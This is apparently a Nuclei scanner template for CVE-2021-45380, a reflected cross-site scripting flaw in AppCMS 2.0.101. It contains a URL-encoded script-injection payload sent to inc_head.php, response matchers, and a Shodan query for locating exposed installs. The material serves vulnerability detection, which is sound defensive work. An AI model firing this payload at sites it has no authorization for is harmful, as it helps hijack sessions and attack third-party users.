id: CVE-2021-45380 info: name: AppCMS - Cross-Site Scripting author: pikpikcu severity: medium description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/source-trace/appcms/issues/8 - https://nvd.nist.gov/vuln/detail/CVE-2021-45380 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-45380 cwe-id: CWE-79 epss-score: 0.00314 epss-percentile: 0.69628 cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:* metadata: max-request: 1 vendor: appcms product: appcms shodan-query: http.html:"Powerd by AppCMS" tags: cve2021,cve,appcms,xss http: - method: GET path: - '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - '"">' condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a0048304602210095fb129387d2b75f24feb79d00dc66407bed270925edc21aeb695b57da802aa3022100d997d277507209d0a025e2218c2163a0ee055aeaf4ac0bc3483b84243f1654af:922c64590222798bb761d5b6d8e72950